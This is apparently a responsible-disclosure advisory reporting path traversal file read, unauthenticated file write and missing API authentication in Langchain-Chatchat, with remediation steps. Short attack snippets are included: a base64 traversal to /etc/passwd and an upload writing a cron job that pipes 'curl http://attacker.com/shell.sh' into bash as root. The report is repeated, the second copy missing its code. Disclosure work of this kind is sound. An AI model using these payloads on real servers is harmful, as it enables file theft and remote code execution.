[SECURITY] Multiple Critical Vulnerabilities: Unauthenticated Path Traversal (Arbitrary File Read/Write) + Missing Authentication on All API Endpoints
Summary
Three critical security vulnerabilities have been identified in Langchain-Chatchat that allow unauthenticated remote attackers to read/write arbitrary files on the server and fully control the application. A combined attack chain can achieve remote code execution (RCE) without any authentication.
| # |
Vulnerability |
Severity |
CWE |
CVSS |
| 1 |
Unauthenticated Path Traversal - Arbitrary File Read |
HIGH |
CWE-22 |
7.5 |
| 2 |
Missing Authentication on All API Endpoints |
CRITICAL |
CWE-306 |
9.8 |
| 3 |
Unauthenticated Path Traversal - Arbitrary File Write |
HIGH |
CWE-22 + CWE-78 |
7.5 |
Discoverer: IcySun (icysun@qq.com)
Advisory 1: Unauthenticated Arbitrary File Read
Endpoint: GET /v1/files/{file_id}/content
The _get_file_path() helper in libs/chatchat-server/chatchat/server/api_server/openai_routes.py decodes a base64url-encoded file_id and uses it directly in os.path.join() without sanitization:
def _get_file_path(file_id: str) -> str:
file_id = base64.urlsafe_b64decode(file_id).decode()
return os.path.join(Settings.basic_settings.BASE_TEMP_DIR, "openai_files", file_id)No check for ../ sequences, no os.path.realpath() validation, no filename format restriction.
Attack:
import base64
target = "assistants/2024-01-01/../../../../../../../../etc/passwd"
file_id = base64.urlsafe_b64encode(target.encode()).decode()
# GET /v1/files/{file_id}/content -> returns /etc/passwdImpact: Read any file accessible to the server process — config files, API keys, SSH keys, database credentials, etc.
Advisory 2: Missing Authentication on All API Endpoints
The FastAPI application in libs/chatchat-server/chatchat/server/api_server/server_app.py registers no authentication middleware. All endpoints are accessible without credentials:
- File management (
/v1/files/*, /chat/file/upload)
- Knowledge base operations (
/kb/*)
- Chat and AI interactions (
/v1/chat/completions, /chat/*)
- Tool execution and MCP connections
Impact: Any network-reachable attacker can manipulate knowledge bases, execute tools, consume LLM API quotas, and exfiltrate all data.
Advisory 3: Unauthenticated Arbitrary File Write
Endpoint: File upload via parse_file() in libs/chatchat-server/chatchat/server/chat/file_chat.py
def parse_file(file: UploadFile) -> dict:
filename = file.filename # user-controlled, from Content-Disposition header
file_path = os.path.join(dir, filename)
with open(file_path, "wb") as f:
f.write(file.file.read())The filename from the multipart upload is used directly with no sanitization, no os.path.basename(), no path containment check.
Attack:
requests.post("http://target:7861/chat/file/upload", files={
"file": ("../../../../../etc/cron.d/backdoor", "* * * * * root curl http://attacker.com/shell.sh | bash\n", "text/plain")
})Impact: Arbitrary file write — can overwrite application configs, write to cron/systemd directories, or inject into shell profiles for RCE.
Combined Attack Chain
No Auth (Advisory 2)
+-> Arbitrary File Read (Advisory 1) -> Steal secrets, SSH keys, credentials
+-> Arbitrary File Write (Advisory 3) -> Write cron/systemd units -> RCE
+-> Direct API Abuse -> Knowledge base poisoning, quota exhaustion
An anonymous attacker can read secrets, then write malicious files for RCE — all without authentication.
Remediation
- Add authentication middleware — API key or JWT-based auth for all endpoints (highest priority).
- Validate file paths — Use
os.path.realpath() + prefix check for all file operations.
- Sanitize filenames — Use
os.path.basename() for uploads, validate format for downloads.
- Restrict process privileges — Do not run as root; use minimal permissions.
Proof of Concept
A unified PoC script demonstrating all three vulnerabilities is available. Please contact icysun@qq.com for the full PoC, detailed report, and reproduction steps.
Disclaimer: This report is submitted for responsible disclosure. The PoC is intended solely for authorized security testing and vulnerability validation by the Langchain-Chatchat maintainers.
[SECURITY] Multiple Critical Vulnerabilities: Unauthenticated Path Traversal (Arbitrary File Read/Write) + Missing Authentication on All API Endpoints
Summary
Three critical security vulnerabilities have been identified in Langchain-Chatchat that allow unauthenticated remote attackers to read/write arbitrary files on the server and fully control the application. A combined attack chain can achieve remote code execution (RCE) without any authentication.
Discoverer: IcySun (icysun@qq.com)
Advisory 1: Unauthenticated Arbitrary File Read
Endpoint:
GET /v1/files/{file_id}/contentThe
_get_file_path()helper inlibs/chatchat-server/chatchat/server/api_server/openai_routes.pydecodes a base64url-encodedfile_idand uses it directly inos.path.join()without sanitization:No check for
../sequences, noos.path.realpath()validation, no filename format restriction.Attack:
Impact: Read any file accessible to the server process — config files, API keys, SSH keys, database credentials, etc.
Advisory 2: Missing Authentication on All API Endpoints
The FastAPI application in
libs/chatchat-server/chatchat/server/api_server/server_app.pyregisters no authentication middleware. All endpoints are accessible without credentials:/v1/files/*,/chat/file/upload)/kb/*)/v1/chat/completions,/chat/*)Impact: Any network-reachable attacker can manipulate knowledge bases, execute tools, consume LLM API quotas, and exfiltrate all data.
Advisory 3: Unauthenticated Arbitrary File Write
Endpoint: File upload via
parse_file()inlibs/chatchat-server/chatchat/server/chat/file_chat.pyThe filename from the multipart upload is used directly with no sanitization, no
os.path.basename(), no path containment check.Attack:
Impact: Arbitrary file write — can overwrite application configs, write to cron/systemd directories, or inject into shell profiles for RCE.
Combined Attack Chain
An anonymous attacker can read secrets, then write malicious files for RCE — all without authentication.
Remediation
os.path.realpath()+ prefix check for all file operations.os.path.basename()for uploads, validate format for downloads.Proof of Concept
A unified PoC script demonstrating all three vulnerabilities is available. Please contact icysun@qq.com for the full PoC, detailed report, and reproduction steps.
Disclaimer: This report is submitted for responsible disclosure. The PoC is intended solely for authorized security testing and vulnerability validation by the Langchain-Chatchat maintainers.